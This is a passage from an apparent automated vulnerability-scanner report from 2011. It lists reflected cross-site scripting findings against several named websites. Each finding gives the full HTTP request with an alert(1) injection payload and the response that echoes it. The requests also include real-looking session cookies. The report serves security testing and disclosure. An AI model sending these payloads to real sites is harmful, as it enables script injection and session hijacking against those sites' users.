   ViewState: /wEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY/y9C8ZIzR2417a<script>alert(1)</script>718a25325a7 --->
...[SNIP]...
6.51. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15c"-alert(1)-"7bb0c543e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:56:49 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:48 GMT
Content-Length: 33904


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?ad15c%22-alert(1)-%227bb0c543e64=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...
6.52. http://www.google.com/search [tch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbae5(a)c4e69dbcb8a was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?sclient=psy&hl=en&source=hp&q=learn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D1112%26pg%3D697&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=76258fd74ceb8990&tch=1dbae5(a)c4e69dbcb8a&ech=1&psi=QW21TdK5G9PngQf2xuWSBA13037356298833 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:47:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 25014

f94-wCe9....S....o....Q...v....l.K<!doctype html><title>learn.shavlik.com/shavlik/index.cfm?m=1112&amp;pg=697. F..\(function(){var jesr_base_page_version=8;var jesr_user_state='c9c918f0';var jesr_sign
...[SNIP]...
index.cfm%3Fm%3D1112%26pg%3D697\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3d76258fd74ceb8990\\x26amp;tch\\x3d1dbae5(a)c4e69dbcb8a\\x26amp;ech\\x3d1\\x26amp;psi\\x3dQW21TdK5G9PngQf2xuWSBA13037356298833\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26google
...[SNIP]...
6.53. http://www.instantengage.com/open_chat.php [Email_To parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /open_chat.php

Issue detail

The value of the Email_To request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5f03"%3balert(1)//2d082375fa0 was submitted in the Email_To parameter. This input was echoed as b5f03";alert(1)//2d082375fa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /open_chat.php?Account_ID=1756&Page_ID=2293&Email_To=alan%40integritydefender.comb5f03"%3balert(1)//2d082375fa0&Email_Subject=Enquires%20for%20Integrity%20Defenders HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:14 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 5284
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>

<script language="javascript">
<!--
//InstantEngage Script Template//

//Page Variables - System Generated
var gURL_Server = "www.instantengage.com";
var gSSL_Port = 443;
va
...[SNIP]...
ww.instantengage.com/images/but_smassist.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images/but_smno_operator.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.comb5f03";alert(1)//2d082375fa0";var OperatorOfflineEmailSubject = "Enquiries for InstantEngage";
var VisitorDefaultName = ""; // The server can actually place the actual Name here
var VisitorDefaultEmail = ""; // The server can a
...[SNIP]...
6.54. http://www.instantengage.com/open_chat.php [Page_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /open_chat.php

Issue detail

The value of the Page_ID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1979%3balert(1)//9927f453968 was submitted in the Page_ID parameter. This input was echoed as e1979;alert(1)//9927f453968 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /open_chat.php?Account_ID=1756&Page_ID=2293e1979%3balert(1)//9927f453968&Email_To=alan%40integritydefender.com&Email_Subject=Enquires%20for%20Integrity%20Defenders HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:11 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 5283
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>

<script language="javascript">
<!--
//InstantEngage Script Template//

//Page Variables - System Generated
var gURL_Server = "www.instantengage.com";
var gSSL_Port = 443;
var gAccount_ID = 1756;var gPage_ID = 2293e1979;alert(1)//9927f453968;var open_chat_direct = true; // TODO: Get VisitorID and browserID etc as per normal query to server, but only once. Then redirect to PreChatURL.
var gStatus = 1; // 1 - Browsing

function onVisitor
...[SNIP]...
6.55. http://www.integritydefender.com/buyerDetails.php [amount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The value of the amount request parameter is copied into the HTML document as plain text between tags. The payload c8b31<script>alert(1)</script>c0fd9e6cce9 was submitted in the amount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489c8b31<script>alert(1)</script>c0fd9e6cce9&item_name=Basic+Personal+Services&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<strong class="blacktitle">Basic Personal Services - $489c8b31<script>alert(1)</script>c0fd9e6cce9</strong>
...[SNIP]...
6.56. http://www.integritydefender.com/buyerDetails.php [amount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The value of the amount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24dc"><script>alert(1)</script>214a3ebceb3 was submitted in the amount parameter. This input was echoed as b24dc\"><script>alert(1)</script>214a3ebceb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489b24dc"><script>alert(1)</script>214a3ebceb3&item_name=Basic+Personal+Services&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="amount" value="489b24dc\"><script>alert(1)</script>214a3ebceb3" />
...[SNIP]...
6.57. http://www.integritydefender.com/buyerDetails.php [buyerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The value of the buyerId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b2c5"><script>alert(1)</script>9ee0e6f089d was submitted in the buyerId parameter. This input was echoed as 9b2c5\"><script>alert(1)</script>9ee0e6f089d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buyerDetails.php?buyerId=689b2c5"><script>alert(1)</script>9ee0e6f089d HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/buyerDetails.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="item_number"        value="689b2c5\"><script>alert(1)</script>9ee0e6f089d" />
...[SNIP]...
6.58. http://www.integritydefender.com/buyerDetails.php [item_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The value of the item_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52a0a"><script>alert(1)</script>b4d4d2ceecc was submitted in the item_name parameter. This input was echoed as 52a0a\"><script>alert(1)</script>b4d4d2ceecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489&item_name=Basic+Personal+Services52a0a"><script>alert(1)</script>b4d4d2ceecc&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="service" value="Basic Personal Services52a0a\"><script>alert(1)</script>b4d4d2ceecc" />
...[SNIP]...
6.59. http://www.integritydefender.com/buyerDetails.php [item_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The value of the item_name request parameter is copied into the HTML document as plain text between tags. The payload 7345d<script>alert(1)</script>9840b0cfec2 was submitted in the item_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489&item_name=Basic+Personal+Services7345d<script>alert(1)</script>9840b0cfec2&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<strong class="blacktitle">Basic Personal Services7345d<script>alert(1)</script>9840b0cfec2 - $489</strong>
...[SNIP]...
6.60. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of the retURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d900d'%3balert(1)//e2f17b11fa9629dc1 was submitted in the retURL parameter. This input was echoed as d900d';alert(1)//e2f17b11fa9629dc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /servlet/servlet.WebToLead?encoding=UTF-8&oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.htmld900d'%3balert(1)//e2f17b11fa9629dc1&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Mon, 25 Apr 2011 16:06:42 GMT
Content-Length: 546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.reputationchanger.com/s
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.reputationchanger.com/scheduled.htmld900d';alert(1)//e2f17b11fa9629dc1');
} else {;
window.location.href ='http://www.reputationchanger.com/scheduled.htmld900d';alert(1)//e2f17b11fa9629dc1';
}
</script>
...[SNIP]...
6.61. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of the retURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0cf9"style%3d"x%3aexpression(alert(1))"99e3e02af5fd8a262 was submitted in the retURL parameter. This input was echoed as f0cf9"style="x:expression(alert(1))"99e3e02af5fd8a262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /servlet/servlet.WebToLead?encoding=UTF-8&oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.htmlf0cf9"style%3d"x%3aexpression(alert(1))"99e3e02af5fd8a262&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Mon, 25 Apr 2011 16:06:42 GMT
Content-Length: 603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.reputationchanger.com/scheduled.htmlf0cf9"style="x:expression(alert(1))"99e3e02af5fd8a262">
...[SNIP]...
6.62. http://www.stillsecure.com/m/ [comments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload b9f53<script>alert(1)</script>165bb6e429d was submitted in the comments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=b9f53<script>alert(1)</script>165bb6e429d&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:59 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<textarea name="comments">b9f53<script>alert(1)</script>165bb6e429d</textarea>
...[SNIP]...
6.63. http://www.stillsecure.com/m/ [company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efe4"><script>alert(1)</script>2a9cfb0f5d8 was submitted in the company parameter. This input was echoed as 2efe4\"><script>alert(1)</script>2a9cfb0f5d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
